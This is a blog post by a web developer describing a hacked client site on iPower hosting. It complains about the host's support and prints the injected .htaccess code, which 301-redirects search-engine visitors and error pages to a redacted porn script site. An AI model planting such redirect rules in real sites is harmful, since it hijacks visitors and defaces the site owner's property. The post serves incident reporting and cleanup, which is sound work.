iPower Hosted Site Hacked with .htaccess Modification

You can bet I will be posting this on Web Hosting Talk later. I already do not like iPower as a host. They suck, simply put. One of our last sites on iPower, one that was not on our iPower reseller, had been the target of a rather malicious and nasty .htaccess hack.

Not only is it irritating that the site got hacked and iPower did not notice or inform us, when we called to tell them they did not sound one bit alerted to the seriousness of the issue. Really bad host.

When asked if they could look into the log files, as I knew the exact date and time it happened, they said that would not lead to much. He would not even transfer me to a Tier 2 tech. I did not push the matter, as I was about to ring his neck. I had already fixed the problem and I could tell the tech was not concerned at all in the matter.

As a matter of fact, he said a "hack" usually happens when a new or old web guy is involved. Well, I work for the old web guy and I am the new web guy, so I don't think so buddy.

This was an genius little hack, some script kiddie must be so proud. They used RewriteCond statements in the .htaccess file to redirect all search traffic from about 20 different search engines to a porn site script that sent you to a random site, oh and 301 redirects to boot. There were also ErrorDocument scripts as well.

Once I looked into the matter the first thing I noticed was the Index and the .htaccess files were modified on April 11. That means the site has been like this for six bleeping days.

The most shocking thing to note here is that "this is not the first time this has happened to one of my client sites," as I am told by coworker. HUH?

Needless to say I changed the password on the account and am moving them to our new reseller on Liquid Web. Hit the jump if you are interested in the code from the little hack.

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://xxx-script-site-deleted.com/ [R=301,L]

ErrorDocument 401 http://xxx-script-site-deleted.com/
ErrorDocument 403 http://xxx-script-site-deleted.com/
ErrorDocument 404 http://xxx-script-site-deleted.com/
ErrorDocument 500 http://xxx-script-site-deleted.com/


Comments (2)

Tim [TypeKey Profile Page]:

Ever find the logs? We had something similar on Bluehost where all our HTML files were deleted except for a new index.htm with some propoganda. Bluehost also refused to find raw logs for me to help track it down but we're still trying. Seems like it must be either a compromised password or some kind of root-level hack, which is what we want to rule out.

Tim [TypeKey Profile Page]:

Ever find the logs? We had something similar on Bluehost where all our HTML files were deleted except for a new index.htm with some propoganda. Bluehost also refused to find raw logs for me to help track it down but we're still trying. Seems like it must be either a compromised password or some kind of root-level hack, which is what we want to rule out.

Post a comment

(If you haven't left a comment here before, you may need to be approved by the site owner before your comment will appear. Until then, it won't appear on the entry. Thanks for waiting.)


Warning: include(/home/meancode/public_html/breakingwindows/footer.php): failed to open stream: Permission denied in /home/breaking/public_html/2008/04/ipower_hosted_site_hacked_with.php on line 241

Warning: include(): Failed opening '/home/meancode/public_html/breakingwindows/footer.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/breaking/public_html/2008/04/ipower_hosted_site_hacked_with.php on line 241

Blogcritics Magazine

Social Networking

Mac Headlines

Read up-to-date headlines on everything Mac.

Content provided by prMac.

ESRB Search

Creative Commons License
This weblog is licensed under a Creative Commons License.
Enhanced with Snapshots